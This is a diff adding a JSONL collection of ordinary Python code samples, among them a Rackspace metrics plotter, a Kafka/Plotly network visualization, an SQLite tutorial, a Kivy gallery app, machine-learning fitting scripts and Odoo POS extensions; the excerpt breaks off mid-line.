diff --git "a/6245.jsonl" "b/6245.jsonl" new file mode 100644--- /dev/null +++ "b/6245.jsonl" @@ -0,0 +1,706 @@ +{"seq_id":"545240774","text":"import requests\nimport json\nimport sys\nimport re\nfrom subprocess import check_output\n\ndef list_metrics(entity,check):\n ts_from = \"1378684800000\" # Mon, 09 Sep 2013 00:00:00 GMT\n ts_to = \"1388534399000\" # Tue, 31 Dec 2013 23:59:59 GMT\n points = 1\n resolution = \"MIN1440\" # FULL, MIN5, MIN20, MIN60, MIN240, MIN1440\n rax_internal_mon_ddi = \"699373\" # THIS IS NOT THE CUSTOMER'S DDI, BUT THE ACCOUNT BEING USED FOR THE MONITORING.\n\n output = check_output([\"raxmon-metrics-list --entity-id=\" + entity + \" --check-id=\" + check + \" --debug 2>&1\"], shell=True)\n # get token\n m = re.search(r'{\"access.*}}}',output) \n data = \"\"\n if m:\n result = m.group(0)\n data = json.loads(result)\n\n # get rid of newlines for easier parsing\n output = re.sub(r'\\n','',output)\n rax_token = data['access']['token']['id']\n m = re.search(r'{ \"values\".*}}', output)\n if m:\n r = m.group(0)\n data = json.loads(r)\n \n metrics = []\n for i in data['values']:\n #print(i['name'])\n metrics.append(i['name'])\n\n headers = {'X-Auth-Token': rax_token}\n all_metrics = []\n for metrics_iterator in metrics:\n url = \"https://monitoring.api.rackspacecloud.com:443/v1.0/\" + rax_internal_mon_ddi\n url += \"/entities/\" + entity + \"/checks/\" + check + \"/metrics/\" + metrics_iterator\n url += \"/plot?from=\" + ts_from + \"&to=\" + ts_to\n #url += \"&points=\" + str(points)\n url += \"&resolution=\" + resolution\n #print(url)\n r = requests.get(url,headers=headers)\n metrics_json = json.loads(r.text)\n # add the DC and metric to the dict\n dc_metric = metrics_iterator.split(\".\")\n metrics_json['dc'] = dc_metric[0]\n metrics_json['metric'] = dc_metric[1]\n all_metrics.append(metrics_json)\n print(\"Metric: \" + metrics_iterator)\n #print(r.text)\n #return_avg(json.loads(r.text))\n\n plot_metric(all_metrics)\n\ndef plot_metric(metrics_list):\n '''\n Get data ready to be plotted. Group by DC.\n '''\n to_plot = \"\"\n js_func = '''\n(function($){\n$(function () {\n $('#container').highcharts({\n chart: {\n type: 'spline'\n },\n title: {\n text: ' per DC'\n },\n subtitle: {\n text: 'subtitle-text'\n },\n xAxis: {\n type: 'datetime',\n dateTimeLabelFormats: { // don't display the dummy year\n month: '%e. %b',\n year: '%b'\n }\n },\n yAxis: {\n title: {\n text: 'unit-of-measure'\n },\n min: 0\n },\n tooltip: {\n formatter: function() {\n return ''+ this.series.name +'
'+\n Highcharts.dateFormat('%e. %b', this.x) +': '+ this.y +' UNITS';\n }\n },\n\n series: [\n'''\n\n data_sets = []\n #for metric_type in \"tt_firstbyte\", \"tt_connect\", \"truncated\", \"duration\", \"bytes\", \"available\", \"average\"\n #for metric_type in \"tt_connect\", \"tt_firstbyte\":\n for metric_type in \"available\", \"average\":\n #print(js_func)\n to_plot += js_func\n for metric in metrics_list:\n if metric_type in metric['metric']:\n #print(\"\\n\" + metric['dc'] + \":\" + metric['metric'])\n #print(\"{name: '\" + metric['dc'] + \".\" + metric['metric'] + \"', marker: {enabled: false}, data: [\")\n to_plot += \"{name: '\" + metric['dc'] + \".\" + metric['metric'] + \"', marker: {enabled: false}, data: [\"\n for val in metric['values']:\n # build data set to be plotted\n #print(\"[\" + str(val['timestamp']) + \", \" + str(val['average']) + \"],\") \n to_plot += \"[\" + str(val['timestamp']) + \", \" + str(val['average']) + \"],\"\n #print(val['timestamp'], val['average'])\n #print(\"],lineWidth: 1,},\")\n to_plot += \"],lineWidth: 1,},\"\n #print(\"]\")\n to_plot += \"]\"\n #print(\"\\n});\\n }); \\n})(jQuery);\")\n to_plot += \"\\n});\\n }); \\n})(jQuery);\"\n data_sets.append(to_plot)\n to_plot = \"\"\n\n for plotset in data_sets:\n print(plotset)\n\ndef return_avg(metric_dict):\n '''\n Return straight average from daily averages.\n '''\n if metric_dict['metadata']['count'] == 0:\n return 0\n avg_sum = 0\n average = 0\n for daily in metric_dict['values']:\n avg_sum += daily['average']\n average = avg_sum / metric_dict['metadata']['count']\n #print(\"Average is: \" + str(average))\n return average\n\n# guy with 2 HSD\nlist_metrics(\"enDuLvcLLH\",\"chNQOXbn6P\")\n\n# fishingammo.com\n#list_metrics(\"enjibMBsS1\",\"ch2BQSRR7R\") # ping\n#list_metrics(\"enjibMBsS1\",\"ch4DQLCsKD\") # http\n\n# vladimirneykov.com\n#list_metrics(\"en18VYUH85\",\"cheoNv7fwH\") # http\n#list_metrics(\"en18VYUH85\",\"chnMqu3ADf\") # ping\n\n#curl -XGET -H \"X-Auth-Token: \"$token \"https://monitoring.api.rackspacecloud.com:443/v1.0/699373/entitis/enDuLvcLLH/checks/chNQOXbn6P/metrics/mzord.available/plot?from=1378684800000&to=1378943700000&points=1\"\n","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"609902824","text":"# url : 127.0.0.1\r\nimport plotly.graph_objects as go\r\nimport time\r\nfrom kafka import KafkaConsumer\r\nimport sys\r\n\r\nbootstrap_servers = ['localhost:9091','localhost:9092','localhost:9090']\r\ntopicName = 'xdp_kafka_topic'\r\n\r\nconsumer = KafkaConsumer (topicName, group_id = 'group1', bootstrap_servers = bootstrap_servers, auto_offset_reset = 'earliest')\r\n\r\ntest_value1 = 14\r\ntest_value2 = 2\r\n\r\nmid_val3 = [0,0,0]\r\n# define colors codes here\r\nRED = \"#ff0000\"\r\nDARK_GREEN = \"#224d17\"\r\nGREEN = \"#099441\"\r\nLIGHT_GREEN = \"#60a830\"\r\nYELLOW_GREEN = \"d9df1d\"\r\nBLACK = \"#000000\"\r\nWHITE = \"#FFFFFF\"\r\nGRAY = \"#808080\"\r\nSILVER = \"C0C0C0\"\r\n# define parameter values for coloring\r\n\r\nLEVEL0 = 0\r\nLEVEL1 = 10\r\nLEVEL2 = 15\r\nLEVEL3 = 20\r\nLEVEL4 = 25\r\nLEVEL5 = 30\r\nLEVEL6 = 35\r\n\r\n# define level colors here\r\n\r\nLEVEL0_COL = GRAY\r\nLEVEL1_COL = YELLOW_GREEN\r\nLEVEL2_COL = LIGHT_GREEN\r\nLEVEL3_COL = GREEN\r\nLEVEL4_COL = DARK_GREEN\r\nLEVEL5_COL = RED\r\n \r\ndef kafka_consumer():\r\n print(\"Kafka consumer initiating...\")\r\n try :\r\n for message in consumer:\r\n value = message.value\r\n# if (value[0] != '0'):\r\n print(value)\r\n print('\\n')\r\n except KeyboardInterrupt:\r\n sys.exit()\r\n\r\ndef draw_graph():\r\n iterator = 0\r\n print(\"Kafka consumer initiating...\")\r\n try :\r\n for message in consumer:\r\n test_value1 = message.value\r\n test_value1 = str(test_value1)\r\n# if (value[0] != '0'):\r\n print(test_value1)\r\n print('\\n')\r\n print(\"Kafka consumer initiaing...\")\r\n# from here, disect the packet and the ip address\r\n \r\n disector = test_value1.find(' ')\r\n\r\n# disector -> address + ' ' + packet/sec\r\n print('\\n')\r\n print(\"ip address : \")\r\n ip_address = test_value1[0:disector]\r\n print(ip_address)\r\n print(\"incoming packets : \")\r\n packets = test_value1[disector+1:]\r\n print(packets)\r\n \r\n\r\n# assign color codes here since I believe color assignment should be done for both components all the time\r\n# later for the economy of the code, two paragraphs below can be merged into one using list : {bpf1,bpf2} and iterating it\r\n if packets == LEVEL0:\r\n bpf2_color = LEVEL0_COL\r\n elif LEVEL0 < packets and packets < LEVEL1 :\r\n bpf2_color = LEVEL1_COL\r\n elif LEVEL1 <= packets and packets < LEVEL2 :\r\n bpf2_color = LEVEL2_COL\r\n elif LEVEL2 <= packets and packets < LEVEL3 :\r\n bpf2_color = LEVEL3_COL\r\n elif LEVEL3 <= packets and packets < LEVEL4 :\r\n bpf2_color = LEVEL4_COL\r\n else :\r\n bpf2_color = LEVEL5_COL\r\n\r\n if test_value2 < LEVEL1 :\r\n bpf3_color = LEVEL1_COL\r\n elif LEVEL1 <= test_value2 and test_value2 < LEVEL2 :\r\n bpf3_color = LEVEL2_COL\r\n elif LEVEL2 <= test_value2 and test_value2 < LEVEL3 :\r\n bpf3_color = LEVEL3_COL\r\n elif LEVEL3 <= test_value2 and test_value2 < LEVEL4 :\r\n bpf3_color = LEVEL4_COL\r\n else :\r\n bpf3_color = LEVEL5_COL\r\n\r\n# Each arguments below have to be assigned only a single time. IF NOT -> ERROR\r\n fig =go.Figure(go.Sunburst(\r\n labels=[\" \" ,\"Kubernetes Master\", \"Kubernetes Worker\", \"DoS Attacker\",\"Ethernet(eno2) \",\"Netronome(enp4s0np1)\",\"Ethernet(eno2)\",\"Netronome(enp32s0np1\",\"Ethernet(eno1)\",\"Intel(enp6s0f0)\"],\r\n# all the settings below probably follows the order of the labels above\r\n\t parents=[\"\",\" \",\" \",\" \",\"Kubernetes Master\",\"Kubernetes Master\",\"Kubernetes Worker\",\"Kubernetes Worker\",\"DoS Attacker\",\"DoS Attacker\"],\r\n#\t values=[20, 20, 20,20], # size of each components of the graph # this line decides the size of the components on the onion-ring. Leaving this blank will result in equal sizing for every component\r\n# values = [BPF2, BPF3, BPF1] : BFP1 size doesn't really change\r\n\t hoverlabel = {\"bordercolor\":BLACK}, # sets the border color of mouse over\r\n marker = {\"colors\":[WHITE,BLACK,BLACK,BLACK,YELLOW_GREEN,GRAY,YELLOW_GREEN,GRAY,YELLOW_GREEN,GRAY]}, # in the order of BPF2, BPF3\r\n\t hovertext = ['','','','','','','','192.168.1.10'],\r\n\t hoverinfo = [\"label+text\"],\r\n ))\r\n fig.update_layout(margin = dict(t=0, l=0, r=0, b=0))\r\n go.visible = False\r\n# if (test_value1 > 50):\r\n fig.show()\r\n except KeyboardInterrupt:\r\n sys.exit() \r\n \r\n\r\ndraw_graph()\r\n#kafka_consumer()\r\n","sub_path":"Visibility-Agent/IOVisor/visualization_kafka_onionring.py","file_name":"visualization_kafka_onionring.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"49450822","text":"from collections import namedtuple\nimport sqlite3\n\n# make a basic Person class\nPerson = namedtuple('Person', ['first_name', 'last_name', 'e_mail'])\ncontacts = [ \n Person('Jon', 'Flanders', 'jon@company.com')]\n\n# make and populate a table\ndb = sqlite3.connect(':memory:')\ndb.execute('CREATE TABLE person ' +\n '(first_name text, last_name text, e_mail text)')\ndb.execute(\"INSERT INTO person (first_name, last_name) VALUES ('Fritz', 'Onion');\")\ndb.execute(\"UPDATE person SET e_mail='fritz@company.com' WHERE first_name='Fritz';\")\n\nfor contact in contacts:\n db.execute('INSERT INTO person VALUES (?, ?, ?);', contact)\n\ndb.execute(\"INSERT INTO person (first_name, last_name) VALUES ('Keith', 'Porteous');\")\ndb.execute(\"INSERT INTO person (first_name, last_name) VALUES ('Jon', 'McCracken');\")\ndb.execute(\"INSERT INTO person (first_name, last_name) VALUES ('Jon', 'Ahern');\")\ndb.execute(\"INSERT INTO person (first_name, last_name) VALUES ('James', 'Lifferth');\")\ndb.execute(\"INSERT INTO person (first_name, last_name) VALUES ('Brian', 'Curtis');\")\n\n\ndef execute_sql_command():\n \"\"\"\n English question: What is the last name of all the people I know whose first name is Jon?\n \"\"\"\n sql_statement = \"\"\"\n SELECT p.last_name as LastName\n FROM person p\n WHERE p.first_name='Jon'\n ORDER BY LastName;\n \"\"\"\n cursor = db.execute(sql_statement)\n\n for row in cursor:\n yield row\n\n\nif __name__ == '__main__':\n for result in execute_sql_command():\n print(result)\n","sub_path":"ud171_backend/06_databases/introduction_to_sql/03_filtering_results_WHERE.py","file_name":"03_filtering_results_WHERE.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"538895386","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\n\nfrom kivy import platform\nfrom kivy.app import App\nfrom kivy.config import Config\nfrom kivy.logger import Logger\nfrom kivy.loader import Loader\nfrom kivy.properties import BooleanProperty\n\nfrom image import CachedImage, clear_cache # Used in the kv file\nfrom imagedir import ImageDir, ImageCarousel\n\nif platform == 'android':\n Logger.debug('KBGALLERY: Importando %s' % datetime.now())\n import android\n from jnius import autoclass, cast\n from android.runnable import run_on_ui_thread\n Intent = autoclass('android.content.Intent')\n String = autoclass('java.lang.String')\n PythonActivity = autoclass('org.renpy.android.PythonActivity')\n activity = PythonActivity.mActivity\n\nif platform == 'win' or platform == 'linux':\n Config.set('graphics', 'width', 480)\n Config.set('graphics', 'height', 756)\n\nAPP = 'KBGALLERY'\nDIR = 'dir'\nFILE = 'file'\n__version__ = \"0.0.1\"\n\n\nclass KBGalleryApp(App):\n\n delay_image_loading = BooleanProperty(False)\n\n def build(self):\n Logger.debug(\"%s: build %s \" % (APP, datetime.now()))\n self.use_kivy_settings = False\n return self.root\n\n def build_config(self, config):\n Logger.debug(\"%s: build_config %s \" % (APP, datetime.now()))\n config.setdefaults('general', {\n 'server_url': 'http://www.lazaro.es:8888/',\n })\n\n def build_settings(self, settings):\n Logger.debug(\"%s: build_settings %s \" % (APP, datetime.now()))\n settings.add_json_panel('KBGallery', self.config, 'settings.json')\n\n def on_pause(self):\n return True\n\n def on_resume(self):\n Logger.debug(\"%s: On resume %s\" % (APP, datetime.now()))\n\n def on_new_intent(self, intent):\n Logger.debug(\"%s: on_new_intent %s %s\" % (\n APP, datetime.now(), intent.toString()))\n\n def on_keypress(self, window, keycode1, keycode2, text, modifiers):\n # Logger.debug(\"%s: on_keypress k1: %s, k2: %s, text: %s, mod: %s\" % (\n # APP, keycode1, keycode2, text, modifiers))\n\n if keycode1 in [27, 1001]:\n if self._app_settings in self._app_window.children:\n self.close_settings()\n return True\n else:\n self.load_previous()\n return True\n return False\n\n def on_start(self):\n Logger.debug(\"%s: on_start %s\" % (APP, datetime.now()))\n\n from kivy.core.window import Window\n Window.bind(on_keyboard=self.on_keypress)\n\n if platform == 'android':\n android.map_key(android.KEYCODE_BACK, 1001)\n\n import android.activity as python_activity\n python_activity.bind(on_new_intent=self.on_new_intent)\n self.on_new_intent(activity.getIntent())\n\n self.server_url = self.config.get('general', 'server_url')\n\n self.root.bind(\n on_touch_down=lambda *a: setattr(self, 'delay_image_loading', True),\n on_touch_up=lambda *a: setattr(self, 'delay_image_loading', False))\n\n imagedir = ImageDir(server_url=self.server_url)\n wp = 'with_previous'\n imagedir.bind(\n on_navigate_top=lambda *a: setattr(self.root, wp, False),\n on_navigate_down=lambda *a: setattr(self.root, wp, True),\n on_img_selected=self.load_carousel,\n path=lambda w,v: setattr(self.root, 'title', v),\n on_loading_start=lambda *a: setattr(self.root, 'loading', True),\n on_loading_stop=lambda *a: setattr(self.root, 'loading', False))\n self.imagedir = imagedir\n\n self.root.container.add_widget(imagedir)\n self.root.bind(on_touch_down=lambda *a: Loader.pause(),\n on_touch_up=lambda *a: Loader.resume())\n Loader.max_upload_per_frame = 1 # Maximize interactivity\n\n def on_stop(self):\n pass\n\n def reload_content(self):\n content = self.root.container.children[0]\n content.reload()\n\n def clear_image_cache(self):\n clear_cache()\n return True\n\n def load_previous(self, *args):\n try:\n content = self.root.container.children[0]\n except:\n return\n if type(content) == ImageDir:\n self.imagedir.load_previous()\n elif type(content) == ImageCarousel:\n self.root.container.remove_widget(self.imagecarousel)\n self.root.container.add_widget(self.imagedir)\n self.imagecarousel = None\n else:\n Logger.error(\"Unknown content type %s\" % type(content))\n\n def load_carousel(self, widget, path, fn):\n self.root.container.remove_widget(self.imagedir)\n imagecarousel = ImageCarousel(server_url=self.server_url, path=path,\n filename=fn)\n self.root.container.add_widget(imagecarousel)\n self.imagecarousel = imagecarousel\n\n def on_config_change(self, config, section, key, value):\n Logger.debug(\"%s: on_config_change key %s %s\" % (\n APP, key, value))\n try:\n content = self.root.container.children[0]\n except:\n return\n if key == 'server_url':\n if type(content) == ImageCarousel:\n self.load_previous()\n content.server_url = value\n\n if platform == 'android':\n @run_on_ui_thread\n def toast(self, text=\"texto\", short=True):\n Logger.debug(\"%s: texto %s, short %s\" % (\n APP, text.encode('ascii', 'ignore'), short))\n Toast = autoclass('android.widget.Toast')\n Gravity = autoclass('android.view.Gravity')\n duration = Toast.LENGTH_SHORT if short else Toast.LENGTH_LONG\n t = Toast.makeText(activity, String(text), duration)\n t.setGravity(Gravity.BOTTOM, 0, 0)\n t.show()\n else:\n def toast(*args, **kwargs):\n pass\n\n def send_log(self):\n if platform != 'android':\n return\n Logger.debug(\"%s: send_log %s\" % (APP, datetime.now()))\n\n from subprocess import Popen\n Uri = autoclass('android.net.Uri')\n File = autoclass('java.io.File')\n FileOutputStream = autoclass('java.io.FileOutputStream')\n Build = autoclass('android.os.Build')\n BV = autoclass('android.os.Build$VERSION')\n\n try:\n f = open(\"log.txt\", \"w\")\n fa = File(activity.getExternalFilesDir(None), \"log.txt\")\n p1 = Popen([\"/system/bin/logcat\", \"-d\"], stdout=f)\n p1.wait()\n out = FileOutputStream(fa)\n f.close()\n f = open(\"log.txt\", \"r\")\n out.write(\"\".join(f.readlines()))\n except Exception as e:\n Logger.debug(\"%s: Log creation failed %s\" % (APP, str(e)))\n finally:\n f.close()\n out.close()\n\n texto = \"%s\\n%s\\n%s\\n%s\\n\\n\" % (\n Build.MANUFACTURER, Build.MODEL, BV.RELEASE, self.about())\n\n intent = Intent(Intent.ACTION_SEND).setType('message/rfc822')\n intent = intent.putExtra(Intent.EXTRA_TEXT, String(texto))\n intent = intent.putExtra(Intent.EXTRA_EMAIL, [\"toledo+kbgallery@lazaro.es\"])\n intent = intent.putExtra(Intent.EXTRA_SUBJECT, String(\"KBGallery Log\"))\n try:\n intent = intent.putExtra(\n Intent.EXTRA_STREAM,\n cast('android.os.Parcelable', Uri.fromFile(fa)))\n\n activity.startActivity(Intent.createChooser(\n intent, String(\"Send Log with:\")))\n except Exception as e:\n Logger.debug(\"%s: Log delivery failed %s\" % (APP, str(e)))\n\n def about(self):\n try:\n with open(\"version.txt\") as f:\n v = f.read()[:-1]\n except:\n v = \"undefined\"\n self.toast(text=\"KBGallery %s\\nJuan Toledo\" % v, short=False)\n return v\n\nif __name__ == '__main__':\n Logger.debug(\"%s: End imports. %s KBGalleryApp().run()\" % (\n APP, datetime.now()))\n KBGalleryApp().run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"501559887","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom datetime import datetime\nfrom sklearn.decomposition import PCA\nfrom sklearn.kernel_approximation import RBFSampler, Nystroem\nfrom sklearn.utils.class_weight import compute_class_weight\nfrom imblearn.over_sampling import SMOTE\n\npd.options.mode.chained_assignment = None\n\n\nstart_time = datetime.now()\nprint(start_time)\n\n\ndef get_chunks(data_len, chunksize):\n chunkstarter = 0\n while chunkstarter < data_len:\n print(\"chunk\",chunkstarter, datetime.now()-start_time)\n chunkender = chunkstarter + chunksize\n x_chunk, y_chunk = x_train.iloc[chunkstarter:chunkender], y_train.iloc[chunkstarter:chunkender]\n #x_chunk, y_chunk = smote.fit_sample(x_chunk, y_chunk)\n #x_chunk, y_chunk = x_train[chunkstarter:chunkender:1], y_train[chunkstarter:chunkender:1]\n \n yield x_chunk, y_chunk\n chunkstarter += chunksize\n \n#import cleaned H1B dataset\n#full dataset can be found: https://www.kaggle.com/nsharan/h-1b-visa/data\n#A description of cleanup can be found: https://github.com/Liptoni/Springboard/blob/master/H1B_Capstone/H1B_Data_Wrangling.docx\nhb_data = pd.read_csv('Z:/Springboard/H1B_Capstone/data/h1b_census_full.csv', index_col='CASE_NUMBER',\n dtype={'block_fips':np.object, 'county_fips':np.object, 'state_fips':np.object} )\n\n\n#drop NAs\nhb_data.dropna(inplace=True)\n\nprint('data cleaned', datetime.now()-start_time)\n\n#split data into labels and features\nlabels = hb_data['CERTIFIED']\nfeatures = hb_data[['FULL_TIME_POSITION', 'PREVAILING_WAGE','SOC_NAME','lon', 'lat', 'county_fips', 'county_pop', 'state_code']]\nfeatures= pd.get_dummies(features, drop_first=True)\n\n\nprint('dummies created', datetime.now()-start_time)\n\n\n# =============================================================================\n# #get class weights\n# weights = compute_class_weight(class_weight='balanced', classes=np.unique(labels), y=labels)\n# weights = {'certified':weights[0], 'denied':weights[1]}\n# \n# print('got weights', datetime.now()-start_time)\n# =============================================================================\n\n#get training and testing data\nx_train, x_test, y_train, y_test = train_test_split(features, labels, test_size = 0.25, random_state=24)\ndata_len = len(x_train)\n\n\nprint('data split', datetime.now()-start_time)\n\n# =============================================================================\n# #define SMOTE\n# smote = SMOTE(random_state = 24)\n# =============================================================================\n\n#split data into batches to meet memory requirements\nbatcher = get_chunks(data_len, 10000)\n\n#define SGD\nsgd = SGDClassifier(alpha=1, loss='hinge', max_iter=5, penalty='l2', tol=None)#, class_weight=weights\n\nscaler = StandardScaler()\n\n#Scale and partial fit classifier for each chunk\nfor x_chunk, y_chunk in batcher:\n x_scaled = scaler.fit_transform(x_chunk)\n sgd.partial_fit(x_scaled, y_chunk, classes=np.unique(labels))\n\n\n#Predict on test set, print results\nprint('predicting', datetime.now()-start_time)\n\ntest_scaled = scaler.fit_transform(x_test)\ny_pred = sgd.predict(test_scaled)\n\nprint(sgd.score(test_scaled, y_test))\nprint(classification_report(y_test, y_pred))\n\nprint(confusion_matrix(y_test, y_pred))\n\n\nprint(\"Done!\")\nprint(datetime.now()-start_time)\n\n\n\n\n","sub_path":"H1B_Capstone/python/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"492297802","text":"import numpy as np\nimport sys\nfrom sklearn import preprocessing\nfrom sklearn.linear_model import Lasso, SGDRegressor\nfrom functions import sigmoid, softmax\nimport statistical_functions as statistics\n\nclass fit():\n def __init__(self, inst): \n self.inst = inst\n \n def create_design_matrix(self, x = 0, N = 0, deg = 0):\n \"\"\" Function for creating a design X-matrix.\n if deg > 0, a polynomial matrix of degree 'deg' for two variables will be \n created, with rows [1, x, y, x^2, xy, xy^2 , etc.]\n if deg == 0, a simple design matrix will be created. Useful for\n big datasets.\n Input for x is a dataset in the form of x_1d.\n Keyword argument deg is the degree of the polynomial you want to fit. \"\"\"\n \n if deg == 0:\n X = self.create_simple_design_matrix(x = x)\n return X\n else:\n X = self.create_polynomial_design_matrix(x = x, N = N, deg = deg)\n return X\n\n def create_simple_design_matrix(self, x = 0):\n ''' Create simple design matrix from a matrix of data. If x = 0, it will\n use the x_1d attribute of the imported dataset'''\n \n if isinstance(x, int):\n self.X = self.inst.x_1d\n else:\n self.X = x\n self.l = self.X.shape[1]\n return self.X \n \n def create_polynomial_design_matrix(self, x=0, N=0, deg=0):\n ''' Create a polynomial design matrix from a matrix of data. If x = 0, it will\n use the x_1d attribute of the imported dataset'''\n \n if isinstance(x, int):\n x = self.inst.x_1d\n N = self.inst.N\n\n self.x = x\n N = x.shape[0]\n \n self.l = int((deg + 1)*(deg + 2) / 2)\t\t# Number of elements in beta\n X = np.ones((N, self.l))\n \n #fit polynomial\n for i in range(1, deg + 1):\n q = int( i * (i + 1) / 2)\n for k in range(i + 1):\n X[:, q + k] = x[:,0]**(i - k) + x[:,1]**k\n \n #Design matrix\n self.X = X\n return X\n \n def fit_design_matrix_logistic_regression(self, descent_method = 'SGD-skl', eta = 0.001, Niteration = 200, m = 5, verbose = False):\n '''solve the model using logistic regression. \n Method 'SGD-skl' for SGD scikit-learn,\n method 'SGD' for SGD with diminishing step length with minibatches,\n method 'GD' for plain gradient descent'''\n \n n, p = np.shape(self.X)\n if descent_method == 'skl-SGD':\n sgdreg = SGDRegressor(max_iter = 50, penalty=None, eta0=eta, fit_intercept = True)\n sgdreg.fit(self.X, self.inst.y_1d.ravel())\n self.betas = sgdreg.coef_\n self.y_tilde = sigmoid(self.X@self.betas + sgdreg.intercept_)\n if verbose:\n # Cost function\n m = self.X.shape[0]\n cost = - (1 / m) * np.sum(self.inst.y_1d.ravel() * self.y_tilde + np.log(sigmoid(-self.y_tilde)))\n print('cost is', cost)\n \n return self.y_tilde, sgdreg.coef_\n \n elif descent_method == 'GD':\n #implement own gradient descent algorithm\n beta = np.ones((p, 1))\n X = self.X\n y = self.inst.y_1d[:, np.newaxis]\n for iter in range(Niteration):\n #Calculate probabilities\n y_tilde_iter = X @ beta\n prob = sigmoid(y_tilde_iter)\n compl_prob = sigmoid(-y_tilde_iter)\n \n #Calculate gradients\n gradients = - X.T @ (y - prob)\n \n #Update parameters\n beta -= eta*gradients * 2./len(y_tilde_iter)\n \n if verbose:\n # Cost function\n m = X.shape[0]\n cost = - (1 / m) * np.sum(y * y_tilde_iter + np.log(compl_prob))\n print('cost is', cost)\n self.betas = beta\n self.y_tilde = sigmoid(self.X @ beta)\n return self.y_tilde, self.betas\n \n elif descent_method == 'SGD':\n #implement own stochastic gradient descent algorithm\n self.inst.sort_in_k_batches(m, random=True, minibatches = True)\n \n #initialize step length. The step will start from the input value of\n #eta and will diminish at the rate of t0/(t + t1) where t = epoch*m + i\n t0 = 1.0\n t1 = t0/eta\n X = self.X\n y = self.inst.y_1d[:, np.newaxis]\n epochs = int(Niteration / m)\n beta = np.ones((p, 1))\n for epoch in range(0, epochs + 0):\n for i in range(m):\n \n # Pick random minibatch\n minibatch_k = np.random.randint(m)\n minibatch_data_idxs = self.inst.m_idxs[minibatch_k]\n X_k = X[minibatch_data_idxs,:]\n y_k = y[minibatch_data_idxs]\n \n # Calculate probabilities\n y_tilde_iter = X_k @ beta\n prob = sigmoid(y_tilde_iter)\n compl_prob = sigmoid(-y_tilde_iter)\n \n # Evaluate gradients\n gradients = - X_k.T @ (y_k - prob)\n \n # Update steplength\n t = epoch*m+i\n eta = t0/(t+t1)\n \n # Adjust parameters\n beta -= eta*gradients * 2./len(y_tilde_iter)\n \n if verbose:\n # Cost function\n m = X.shape[0]\n cost = - (1 / m) * np.sum(y * y_tilde_iter + np.log(compl_prob))\n print('cost is', cost)\n self.betas = beta\n self.y_tilde = sigmoid(self.X @ beta)\n return self.y_tilde, self.betas\n \n \n def fit_design_matrix_numpy(self):\n \"\"\"Method that uses the design matrix to find the coefficients beta, and\n thus the prediction y_tilde\"\"\"\n X = self.X\n y = self.inst.y_1d.ravel()\n \n beta = np.linalg.pinv(X.T.dot(X)).dot(X.T).dot(y)\n \n y_tilde = X @ beta\n return y_tilde, beta\n\n def fit_design_matrix_ridge(self, lambd):\n \"\"\"Method that uses the design matrix to find the coefficients beta with \n the ridge method, and thus the prediction y_tilde\"\"\"\n X = self.X\n y = self.inst.y_1d.ravel()\n\n beta = np.linalg.pinv(X.T.dot(X) + lambd*np.identity(self.l)).dot(X.T).dot(y)\n y_tilde = X @ beta\n return y_tilde, beta\n\n def fit_design_matrix_lasso(self, lambd, maxiter = 10e5):\n \"\"\"The lasso regression algorithm implemented from scikit learn.\"\"\"\n lasso = Lasso(alpha = lambd, max_iter = maxiter, tol = 0.01, normalize= (not self.inst.normalized), fit_intercept=(not self.inst.normalized))\n lasso.fit(self.X,self.inst.y_1d.ravel())\n beta = lasso.coef_\n y_tilde = self.X@beta\n return y_tilde, beta\n\n def test_design_matrix(self, beta, X = 0):\n \"\"\"Testing a design matrix with beta\"\"\"\n if isinstance(X, int):\n X = self.X\n y_tilde = X @ beta\n return y_tilde\n \n","sub_path":"fit_matrix.py","file_name":"fit_matrix.py","file_ext":"py","file_size_in_byte":7421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"342307419","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nimport itertools\nimport logging\n\nfrom odoo import api, fields, models, tools, _\nimport requests\nimport time\nimport json\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass ProductTemplateIngerit(models.Model):\n _inherit = 'product.template'\n\n property_stock_inventory_2 = fields.Many2one(\n 'stock.location', \"Inventory Location\",\n company_dependent=True, check_company=True,\n help=\"This stock location will be used, instead of the default one, as the source location for stock moves generated when you do an inventory.\")\n property_stock_comandera = fields.Many2one(\n 'stock.location', \"Inventory Location\",\n company_dependent=True, check_company=True,\n help=\"This stock location will be used, instead of the default one, as the source location for stock moves generated when you do an inventory.\")\n\nclass ProductTemplateInherit(models.Model):\n _inherit = \"res.currency\"\n\n @api.model\n def print_barcode(self):\n busqueda = self.env['res.currency.rate'].search([], order='id desc')\n if busqueda:\n rate = busqueda[0].rate\n return rate\n\nclass PosPaymentMethod(models.Model):\n _inherit = 'pos.payment.method'\n vpos_check = fields.Boolean(default=False)\n typo_vpos = fields.Selection([\n ('tarjeta', 'Vpos - Tarjetas'),\n ('cheque', 'Vpos - Cheque'),\n ])\n\nclass PosOrder(models.Model):\n _inherit = 'pos.order'\n\n @api.model\n def api_vpos_sent(self, id_metodo, cliente_id, amount):\n metodo = self.env['pos.payment.method'].search([('id','=', id_metodo)])\n info_data = []\n if metodo:\n if metodo.vpos_check == True:\n if cliente_id == 'False':\n return 'borrar'\n cliente = self.env['res.partner'].search([('id','=', cliente_id)])\n tipo_persona = cliente.company_type\n if tipo_persona == 'person':\n cedula = cliente.identification_id\n else:\n cedula = ''\n amount = format(amount, '.2f')\n info_data.append({\n 'validacion': metodo.typo_vpos,\n 